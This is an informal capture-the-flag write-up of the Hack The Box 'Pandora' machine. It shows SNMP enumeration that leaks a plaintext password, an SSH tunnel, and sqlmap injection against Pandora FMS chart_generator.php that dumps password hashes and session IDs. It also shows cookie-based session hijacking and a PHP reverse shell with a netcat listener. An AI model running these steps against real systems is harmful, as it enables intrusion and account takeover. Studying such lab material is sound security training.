CTF Pandora

/etc/hosts

10.10.11.136 pandora.htb

nmap

nmap -sV -p- 10.10.11.136

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

wfuzz

wfuzz --sc 200 -w Documents/wordlist/directory-list-2.3-medium.txt http://pandora.htb/FUZZ 

Nothing, same for the subdoimains.

nmap n°2

sudo nmap -sU --min-rate 100 pandora.htb
PORT      STATE  SERVICE
161/udp   open   snmp
19283/udp closed keysrvr

let’s see what we can do with snmp

Matasploit

msfconsole
use auxiliary/scanner/snmp/snmp_enum
show options 
set rhost 10.10.11.136


This is so cool, I can see every process, there is lot off hackers in the box.

/usr/bin/host_check -u daniel -p HotelBabylon23

ssh

ssh daniel@pandora.htb

lse


on My computer in my script directory

python2.7 -m SimpleHTTPServer

on the target

wget http://10.10.15.22:8000/lse.sh
chmod +x lse.sh
./lse.sh
============================================================( file system )=====
[*] fst000 Writable files outside user's home.............................. yes!
[*] fst010 Binaries with setuid bit........................................ yes!
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/bin/pandora_backup
---

pownkit

root         960  0.0  0.2 236420  8932 ?        Ssl  10:00   0:00 /usr/lib/policykit-1/polkitd --no-debug


I have to resist!!!

pandora_backup


I have to pwn matt first.

linPEAS

https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

I’m not supposed to use this exploit…
I can do it to get the frre flags but it’m not a cheater.

I have other open ports.


Interesting files

Mysql user:

mysql

nmap -sV -p- 127.0.0.1

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
3306/tcp open  mysql   MySQL 5.5.5-10.3.32-MariaDB-0ubuntu0.20.04.1

I don’t have the creds

web

I wanted to browse pandora.panda.htb:

it’s in my /etc/hosts but it’s not working, so tryed to do it via ssh with curl.

curl pandora.panda.htb

Same problem, let’s see his /etc/hosts

daniel@pandora:/tmp/dir$ cat /etc/hosts
127.0.0.1 localhost.localdomain pandora.htb pandora.pandora.htb
127.0.1.1 pandora

127.0.0.1 pandora is the website I saw on the port 80,
I think 127.0.0.1 work only on localhost.

daniel@pandora:/tmp/dir$ curl pandora.pandora.htb
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">

Yesss!!!!
Now I have to find a way to se in on my browser.

Web tunneling

https://www.it-connect.fr/chapitres/tunneling-ssh/
It’s french but it’s good!

ssh -f daniel@pandora.htb -L 2500:localhost:80 -N

Boom!


Where is the password… what is the username…(╯°□°)╯︵ ┻━┻)

Oh no I have to be fast.

Connnect with daniel

I was trying to connect with daniel.
Ihave this error:

It’s good, I have to use the API.

Browsing the files

In /var/www/pandora/pandora_console

cat pandoradb.sql |grep pass
	`plugin_pass` text,
	`password` varchar(45) default '',
	`password` text,
	`snmp_auth_pass` varchar(255) NOT NULL default '',
	`snmp_privacy_pass` varchar(255) NOT NULL default '',
	`plugin_pass` text,
	`password` varchar(45) default NULL,
	`force_change_pass` tinyint(1) unsigned NOT NULL default 0,
	`last_pass_change` DATETIME  NOT NULL DEFAULT 0,
	`ehorus_user_level_pass` VARCHAR(45),
-- Table `treset_pass_history`
CREATE TABLE IF NOT EXISTS `treset_pass_history` (
-- "pass_opt" are deprecated for the 5.1.
	`pass_opt` varchar(50) default '',
	`pass` varchar(100) NOT NULL default '',
	`is_password_type` tinyint(1) NOT NULL default 0,
-- Table `tpassword_history`
CREATE TABLE IF NOT EXISTS `tpassword_history` (
	`id_pass`  int(10) unsigned NOT NULL auto_increment,
	`password` varchar(45) default NULL,
	PRIMARY KEY  (`id_pass`)
	`plugin_pass` text default '',
	`password` varchar(100) default '',
	`password` varchar(100) default '',
	`dbpass` text,
	`meta_dbpass` text,
	`api_password` text NOT NULL,
CREATE TABLE IF NOT EXISTS `treset_pass` (
cat DB_Dockerfile 
FROM mysql:5.5
MAINTAINER Pandora FMS Team <info@pandorafms.com>

WORKDIR /pandorafms/pandora_console

ADD pandoradb.sql /docker-entrypoint-initdb.d
ADD pandoradb_data.sql /docker-entrypoint-initdb.d
RUN chown mysql /docker-entrypoint-initdb.d

ENV MYSQL_DATABASE=pandora

RUN echo " \n\
sed -i \"1iUSE \$MYSQL_DATABASE\" /docker-entrypoint-initdb.d/pandoradb.sql \n\
sed -i \"1iUSE \$MYSQL_DATABASE\" /docker-entrypoint-initdb.d/pandoradb_data.sql \n\
" >> /docker-entrypoint-initdb.d/create_pandoradb.sh

Dbmane=”pandora”
Table=”tpassword_history”
This website show where we can exploit.
https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained

sqlmap

I don’t use sqlmap very often, that’s why I had lot of trouble.

sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php" -D pandora

[20:44:13] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1'). You are advised to rerun with '--crawl=2'
sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?id=''" -D pandora --tables

[20:45:33] [WARNING] GET parameter 'id' does not seem to be injectable

Now I have to find out what I have to use instead if ‘id’.

sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?session_id=''" -D pandora

[20:47:42] [WARNING] potential permission problems detected ('Access denied')

I have an another error, it’s good.
This is a cheat sheet:
https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet

sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?session_id=''"  -D pandora -T tpassword_history --dump

+---------+---------+---------------------+----------------------------------+---------------------+
| id_pass | id_user | date_end            | password                         | date_begin          |
+---------+---------+---------------------+----------------------------------+---------------------+
| 1       | matt    | 0000-00-00 00:00:00 | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 |
| 2       | daniel  | 0000-00-00 00:00:00 | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 |
+---------+---------+---------------------+----------------------------------+---------------------+

list of tables

sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?session_id=''" -D pandora --tables

[178 tables]
+------------------------------------+
| taddress                           |
| taddress_agent                     |
| tagent_access                      |
| tagent_custom_data                 |
| tagent_custom_fields               |
| tagent_custom_fields_filter        |
| tagent_module_inventory            |
| tagent_module_log                  |
| tagent_repository                  |
| tagent_secondary_group             |
| tagente                            |
| tagente_datos                      |
| tagente_datos_inc                  |
| tagente_datos_inventory            |
| tagente_datos_log4x                |
| tagente_datos_string               |
| tagente_estado                     |
| tagente_modulo                     |
| talert_actions                     |
| talert_commands                    |
| talert_snmp                        |
| talert_snmp_action                 |
| talert_special_days                |
| talert_template_module_actions     |
| talert_template_modules            |
| talert_templates                   |
| tattachment                        |
| tautoconfig                        |
| tautoconfig_actions                |
| tautoconfig_rules                  |
| tcategory                          |
| tcluster                           |
| tcluster_agent                     |
| tcluster_item                      |
| tcollection                        |
| tconfig                            |
| tconfig_os                         |
| tcontainer                         |
| tcontainer_item                    |
| tcredential_store                  |
| tdashboard                         |
| tdatabase                          |
| tdeployment_hosts                  |
| tevent_alert                       |
| tevent_alert_action                |
| tevent_custom_field                |
| tevent_extended                    |
| tevent_filter                      |
| tevent_response                    |
| tevent_rule                        |
| tevento                            |
| textension_translate_string        |
| tfiles_repo                        |
| tfiles_repo_group                  |
| tgis_data_history                  |
| tgis_data_status                   |
| tgis_map                           |
| tgis_map_connection                |
| tgis_map_has_tgis_map_con          |
| tgis_map_layer                     |
| tgis_map_layer_groups              |
| tgis_map_layer_has_tagente         |
| tgraph                             |
| tgraph_source                      |
| tgraph_source_template             |
| tgraph_template                    |
| tgroup_stat                        |
| tgrupo                             |
| tincidencia                        |
| titem                              |
| tlanguage                          |
| tlayout                            |
| tlayout_data                       |
| tlayout_template                   |
| tlayout_template_data              |
| tlink                              |
| tlocal_component                   |
| tlog_graph_models                  |
| tmap                               |
| tmensajes                          |
| tmetaconsole_agent                 |
| tmetaconsole_agent_secondary_group |
| tmetaconsole_event                 |
| tmetaconsole_event_history         |
| tmetaconsole_setup                 |
| tmigration_module_queue            |
| tmigration_queue                   |
| tmodule                            |
| tmodule_group                      |
| tmodule_inventory                  |
| tmodule_relationship               |
| tmodule_synth                      |
| tnetflow_filter                    |
| tnetflow_report                    |
| tnetflow_report_content            |
| tnetwork_component                 |
| tnetwork_component_group           |
| tnetwork_map                       |
| tnetwork_matrix                    |
| tnetwork_profile                   |
| tnetwork_profile_component         |
| tnetworkmap_ent_rel_nodes          |
| tnetworkmap_enterprise             |
| tnetworkmap_enterprise_nodes       |
| tnews                              |
| tnota                              |
| tnotification_group                |
| tnotification_source               |
| tnotification_source_group         |
| tnotification_source_group_user    |
| tnotification_source_user          |
| tnotification_user                 |
| torigen                            |
| tpassword_history                  |
| tperfil                            |
| tphase                             |
| tplanned_downtime                  |
| tplanned_downtime_agents           |
| tplanned_downtime_modules          |
| tplugin                            |
| tpolicies                          |
| tpolicy_agents                     |
| tpolicy_alerts                     |
| tpolicy_alerts_actions             |
| tpolicy_collections                |
| tpolicy_groups                     |
| tpolicy_modules                    |
| tpolicy_modules_inventory          |
| tpolicy_plugins                    |
| tpolicy_queue                      |
| tprofile_view                      |
| tprovisioning                      |
| tprovisioning_rules                |
| trecon_script                      |
| trecon_task                        |
| trel_item                          |
| tremote_command                    |
| tremote_command_target             |
| treport                            |
| treport_content                    |
| treport_content_item               |
| treport_content_item_temp          |
| treport_content_sla_com_temp       |
| treport_content_sla_combined       |
| treport_content_template           |
| treport_custom_sql                 |
| treport_template                   |
| treset_pass                        |
| treset_pass_history                |
| tserver                            |
| tserver_export                     |
| tserver_export_data                |
| tservice                           |
| tservice_element                   |
| tsesion                            |
| tsesion_extended                   |
| tsessions_php                      |
| tskin                              |
| tsnmp_filter                       |
| ttag                               |
| ttag_module                        |
| ttag_policy_module                 |
| ttipo_modulo                       |
| ttransaction                       |
| ttrap                              |
| ttrap_custom_values                |
| tupdate                            |
| tupdate_journal                    |
| tupdate_package                    |
| tupdate_settings                   |
| tuser_double_auth                  |
| tuser_task                         |
| tuser_task_scheduled               |
| tusuario                           |
| tusuario_perfil                    |
| tvisual_console_elements_cache     |
| twidget                            |
| twidget_dashboard                  |
+------------------------------------+
sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?session_id=''"  -D pandora -T tsessions_php --dump

+----------------------------+------------------------------------------------------+-------------+
| id_session                 | data                                                 | last_active |
+----------------------------+------------------------------------------------------+-------------+
| 07ou61d2jsi3087a9jg12s3m1k | NULL                                                 | 1644502695  |
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel";                             | 1638783555  |
| 0ahul7feb1l9db7ffp8d25sjba | NULL                                                 | 1638789018  |
| 1t2n71opaqeoausmhaqk277c21 | id_usuario|s:6:"daniel";                             | 1644502477  |
| 1um23if7s531kqf5da14kf5lvm | NULL                                                 | 1638792211  |
| 2e25c62vc3odbppmg6pjbf9bum | NULL                                                 | 1638786129  |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel";                             | 1638540332  |
| 3fq6hl9r8kbadgq6r5bfjmojm5 | NULL                                                 | 1644502325  |
| 3me2jjab4atfa5f8106iklh4fc | NULL                                                 | 1638795380  |
| 4f51mju7kcuonuqor3876n8o02 | NULL                                                 | 1638786842  |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel";                             | 1638535373  |
| 59qae699l0971h13qmbpqahlls | NULL                                                 | 1638787305  |
| 5fihkihbip2jioll1a8mcsmp6j | NULL                                                 | 1638792685  |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel";                             | 1638281946  |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel";                             | 1641195617  |
| 81f3uet7p3esgiq02d4cjj48rc | NULL                                                 | 1623957150  |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel";                             | 1638446321  |
| 8uiokruc91od5tphgekpsau4lp | alert_msg|a:0:{}new_chat|b:0;                        | 1644502812  |
| 8upeameujo9nhki3ps0fu32cgd | NULL                                                 | 1638787267  |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel";                             | 1638881787  |
| a3a49kc938u7od6e6mlip1ej80 | NULL                                                 | 1638795315  |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel";                             | 1638881664  |
| cojb6rgubs18ipb35b3f6hf0vp | NULL                                                 | 1638787213  |
| d0carbrks2lvmb90ergj7jv6po | NULL                                                 | 1638786277  |
| d0h8gpqrh99ur3pfcb53vqak5e | NULL                                                 | 1644513572  |
| elks2rkjdnk8f001jqbkinael0 | NULL                                                 | 1644513405  |
| eqsc2gjr37g0ug1q4qdk3rabh4 | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; | 1644502437  |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel";                             | 1641200284  |
| fikt9p6i78no7aofn74rr71m85 | NULL                                                 | 1638786504  |
| fqd96rcv4ecuqs409n5qsleufi | NULL                                                 | 1638786762  |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel";                             | 1638783230  |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0;  | 1644512890  |
| gf40pukfdinc63nm5lkroidde6 | NULL                                                 | 1638786349  |
| h1ge39342hcid93s3ghk0nhl3c | NULL                                                 | 1644502501  |
| heasjj8c48ikjlvsf1uhonfesv | NULL                                                 | 1638540345  |
| hif1pavjlks18e7oqgu8bmvhis | NULL                                                 | 1644513371  |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel";                             | 1638168492  |
| j85l7a3q010b3ul6sv2eh6amo6 | NULL                                                 | 1644502455  |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel";                             | 1638456173  |
| kp90bu1mlclbaenaljem590ik3 | NULL                                                 | 1638787808  |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL                                                 | 1638796348  |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel";                             | 1638540482  |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel";                             | 1637667827  |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel";                             | 1638168416  |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL                                                 | 1638787723  |
| r097jr6k9s7k166vkvaj17na1u | NULL                                                 | 1638787677  |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel";                             | 1638889082  |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel";                             | 1638547193  |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel";                             | 1638793297  |
| vntmpokca9aee53q48op3mesqs | id_usuario|s:6:"daniel";                             | 1644502107  |
+----------------------------+------------------------------------------------------+-------------+

| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:”matt”;alert_msg|a:0:{}new_chat|b:0;

You have to past it in the cookie.

Refresh the page..
And now you are matt, you can also take the admin cookie but someone else is playing with it,
so it’s not working.

I have to kill them.


Oh, sorry ppl, it’s not working.
Hummm, it’s working because I was logged in as admin, but I removed the cookie.
One of them is logged as admin, he have to finish the box first I think
Someone is using chisel, I have to try this tool too.
I think it’s like mu tunnel ssh.

https://github.com/jpillora/chisel
Ok I will try later.

As admin.

Now I’m admin on the machine, I had to wait 2 hours.

Download the revershell

I’v downloaded a reversshell here:
https://github.com/pentestmonkey/php-reverse-shell

$ip = '10.10.15.27';  // CHANGE THIS
$port = 4648;       // CHANGE THIS

Zip it

zip -r php-reverse-shell.zip php-reverse-shell.php

netcat

nc -lvp 4648

Upload it

I’m matt

pandora_backup

I can’t be admin on the webpage, it’s buggy.
I leave this CTF.